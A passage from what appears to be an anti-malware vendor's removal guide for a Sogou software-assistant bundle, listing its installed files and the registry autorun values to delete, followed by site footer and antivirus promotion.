    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\beginexp.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\confirm_dlg.xml (2 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\update_nor.png (18 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\hover̬.png (17 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\uninstall_dwn.png (18 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\ËÑË÷ɾ³ý.png (17 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\USB.png (7 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\radio.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_hot.png (350 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\AdbWinUsbApi.dll (2628 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\IEHint.dll (10252 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\newbutton.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\dlgClose_nor.png (1 bytes)
    %Program Files%\SogouSoftware\update\USBDT.dll (14494 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\5.png (18 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\aapt.exe (22008 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_right.png (1 bytes)
    %Program Files%\SogouSoftware\update\UpdateService.exe (6928 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\follow_tip.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\grin.png (24 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\DrvInst32\DrvInst_x86.exe (10321 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\3.0.0.0\apktool.ini (44 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_mask.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\DrvInst64\DrvInst_x64.exe (10382 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\logo3636.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\menu.xml (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp\System.dll (11 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\update_list_dlg_otherfont.xml (5 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\dlgClose_dwn.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\ScrollBar\scrollH.png (909 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\search_delete.png (17 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\info.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\SogouPhoneService.exe (22004 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_progress_bg.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\upgrade_beta_list_item.xml (5 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\scroll_bk.png (3 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\update_hov.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_progress_bk.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\recommend_hov.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\closebtn_hover.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\dlg_feedback.xml (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\recommend_selected.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\info_icon.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\beginbtn.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\tips_down.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\smallbtn.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\progress_bk.png (952 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\smalldlg_shadow.png (3 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\search_bar_nor.png (18 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\feedback_nor.png (17 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\check.png (1 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Èí¼þÖúÊÖ\жÔØÈí¼þÖúÊÖ.lnk (501 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\bottombk.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_sel.png (347 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\4.png (18 bytes)
    %Program Files%\SogouSoftware\update\SogouPDAInfo.sqlite3 (3624 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\classify_btn_pushed.png (130 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\apostrophe.gif (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\closebtn_normal.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\soft_search_list.xml (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\group_list_item.xml (693 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\downloading.gif (7 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\button140.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\phone_normal.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\allow_debug.png (2712 bytes)
    %Program Files%\SogouSoftware\Èí¼þÖúÊÖ.lnk (1284 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\update_dwn.png (18 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\DrvInst32\DIFxAPI.dll (12309 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\left_btn_mask.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\tab.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\menubtn.png (3 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\wait_dev.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_confirm.png (632 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\progress_fore.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\close_act.png (17 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\download_hov.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\Õýʽ°æÑ¡ÖÐ״̬.png (15476 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\all_updated.png (9 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\download_bind_checkbox.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\setting_act.png (18 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\connect_dev.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\uninstall_list_item.xml (3 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\dlgClose_act.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\feedback_dwn.png (17 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\shy.png (5 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\update_info.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ApkTool.xml (1568 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\CommonState.dll (1332 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\continuebtn_small.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\upgrade_ignore_list_item.xml (3 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\progress_bk.png (17660 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\npdownload.dll (8748 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\dlgshadow.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\icon_success.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\downloadComplete_list_item.xml (4 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\closebtn_normal_dlg.png (415 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_title.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\down_smt.png (3 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_left.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\setting_nor.png (18 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\SogouSoftware.dll (25317 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\SogouApkTool.exe (47860 bytes)
    %Documents and Settings%\All Users\Desktop\Èí¼þÖúÊÖ.lnk (720 bytes)
    %Program Files%\SogouSoftware\manifest.cfg (30 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\sqlite3.dll (10053 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_app2phone_arrow.png (2 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\AdbWinApi.dll (4250 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\1.png (18 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\menu_bk.png (2 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_simple_up.png (15 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\download_nor.png (18 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\IEHint64.dll (10878 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\download_dwn.png (18 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Èí¼þÖúÊÖ\Èí¼þÖúÊÖ.lnk (734 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\tab_bk.png (2 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\tooltip.png (2 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\default_pkgicon.png (2 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\npdownload64.dll (9079 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\phone_unconnected.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_mid.png (939 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\7.png (18 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\GIF\loading.gif (494 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\logo.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\setting_dwn.png (18 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\uninstall_nor.png (18 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\search_bar_act.png (17 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_progress.gif (9 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\warning_icon.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\3.0.0.0\SogouPDAInfo.sqlite3 (3624 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\close_dwn.png (17 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\btn_3state.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\progress_fore.gif (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\confirm_closebtn.png (4 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\progress_fore.png (15817 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\download_bind_list_item.xml (2 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\scroll_thu.png (2 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\dlg_settings.xml (6 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\logo4848default.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\update_hand.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\scroll_trs.png (938 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\update_list_dlg.xml (5 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_simple.png (285 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\DuiLib.dll (17602 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\update_dlg_otherfont.xml (3 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\2.png (18 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ready_icon.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\progress_pause.png (17448 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\6.png (18 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\9 .png (18 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\item_icon2.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\smallbtn_shadow.png (3 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\uninstall_hov.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\web_external_browser_dlg.xml (318 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\tooltips_dlg.xml (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\download_list_item.xml (2 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_app2phone.png (16 bytes)
    %Program Files%\SogouSoftware\uninst.exe (794 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_banner.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\3.png (18 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\loading.gif (2 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\checkbox.png (3 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\ScrollBar\scroll.png (13 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\magnifier_search.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\8.png (18 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\feedback_act.png (17 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\closebtn_active.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\bigbtn_shadow.png (3 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\install_driver.gif (1568 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\tips.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\apk.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\finishbtn.png (817 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\SogouAapt.exe (24085 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\button160.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\confirm_bk.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\Ñ¡ÖÐ̬.png (17 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\item_icon_5.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\APKlogo.ico (2610 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\menu_item.png (3 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\update_dlg.xml (3 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\item_icon_4.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\close_nor.png (17 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\MySoftwareManager.xml (24 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_ready.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\search_bar_act_focus.png (17 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\guide_smt.png (2712 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\download_bind_bg.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\phone_connected.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\adbdll.dll (2430 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\update_confirm_dlg.xml (2 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\button.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\android_ver.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\closebtn.png (4 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ConfirmDlg.xml (2 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\close_search.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\item_icon.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\DrvInst64\DIFxAPI.dll (11174 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\recommend_classify_table.xml (4 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\item_icon_3.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\j3lx7ew39.exe (2868107 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\qbdrf\dr.dll (83 bytes)
    %Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\Report.Ini (511 bytes)
    %System%\GroupPolicy\gpt.ini (315 bytes)
    %System%\GroupPolicy\Machine\Registry.pol (268 bytes)
    %System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
    %System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\A89DFCC31C360BA5CBD616749B1B1C5D (140 bytes)
    %System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\A89DFCC31C360BA5CBD616749B1B1C5D (152 bytes)
    %System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\QBDownload.exe (5442 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\QQPCDownload8889533.exe (7972 bytes)
    

    5. 

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):
    

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "WinSideBySideSetupCleanup 842843" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\842843"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "WinSideBySideSetupCleanup 800656" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\800656"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "WinSideBySideSetupCleanup 806309" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\806309"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "WinSideBySideSetupCleanup 816749" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\816749"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "WinSideBySideSetupCleanup 761294" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\761294"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "WinSideBySideSetupCleanup 825721" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\825721"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "WinSideBySideSetupCleanup 732509" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\732509"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "WinSideBySideSetupCleanup 776418" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\776418"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "SogouSoftware" = "%Program Files%\SogouSoftware\SogouSoftware.exe /AutoRun"
    

    6. 

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    7. 

  7. Reboot the computer.
    8. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now